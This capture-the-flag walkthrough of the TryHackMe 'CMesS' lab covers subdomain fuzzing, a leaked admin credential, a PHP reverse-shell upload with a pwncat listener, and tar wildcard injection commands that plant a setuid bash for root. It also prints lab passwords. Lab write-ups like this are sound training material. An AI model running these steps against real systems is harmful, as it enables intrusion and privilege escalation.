TryHackMe - CMesS (Medium)

Summary

Subdomain fuzzing with Wfuzz finds a hidden domain dev.cmess.htb. This domain hosts a static page that leaks CMS admin panel credential. In the admin panel, there is an upload form where we can upload php-reverse-shell.php and catch a reverse shell as www-data.
On the victim machine, there is a backup file that leaks the user Andre's password. At this stage we can SSH in as Andre and get a user shell.
In the privilege escalation phase, we find a "cron wildcard" vulnerability and get a root shell with tar injection.

IP

  • RHOST: 10.10.39.82
  • LHOST: 10.13.12.2

Nmap

Nmap

Directory Fuzzing

Fuzz directory using Gobuster:
gobuster dir -u http://cmess.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Gobuster finds a directory /admin:
Gobuster
The directory /admin has a login form, but we don't know the credential yet:
Login form

VHost Discovery

Fuzz subdomain using Wfuzz:
wfuzz -c -u 'http://cmess.thm' -H "Host:FUZZ.cmess.thm" -w top5000.txt --hw 290
Wfuzz finds dev.cmess.thm:
Update /etc/hosts:
/etc/hosts

Admin Panel: Leaked Credential in Hidden Subdomain

http://dev.cmess.thm has a development log. Through the convention between Andre and the support, we can learn his credential [email protected]:KPFTN_f2yxe%:
Development Log
Use this credential for admin panel login and now we have access to the admin panel:
Admin panel

www-data Shell: File Upload

Go to "Content => File Manager" and we find an upload form:
Upload form
Upload php-reverse-shell.php. It turns out that the uploaded files are stored in /assets:
assets
Start a pwncat listener:
pwncat-cs :443
Trigger the reverse shell payload at http://cmess.thm/assets/php-reverse-shell.php and catch a reverse shell as www-data:
www-data shell

User Shell: Leaked Credential in Backup File

LinPEAS finds a readable backup file /opt/.password.bak:
/opt/.password.bak
This file contains Andre's password:
Andre's password
SSH in using the credential andre:UQfsdCB7aAP6 and now we get a user shell:
User shell

Privilege Escalation: Cron Wildcard

Examine crontab:
Crontab
This falls into the "cron wildcard" scenario. To learn more, read my note:
Cron Jobs
ctfnote.com
Linux Privilege Escalation: Cron Jobs
Prepare a payload:
$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > ~/backup/runme.sh
$ chmod +x ~/backup/runme.sh
$ touch ~/backup/--checkpoint=1
$ touch ~/backup/--checkpoint-action=exec=sh\ runme.sh
Wait 2 minutes for the cronjob to run the payload script and then spawn a root shell:
/tmp/bash -p
Now we have a root shell:
root shell
Copy link
Outline
Summary
IP
Nmap
Directory Fuzzing
VHost Discovery
Admin Panel: Leaked Credential in Hidden Subdomain
www-data Shell: File Upload
User Shell: Leaked Credential in Backup File
Privilege Escalation: Cron Wildcard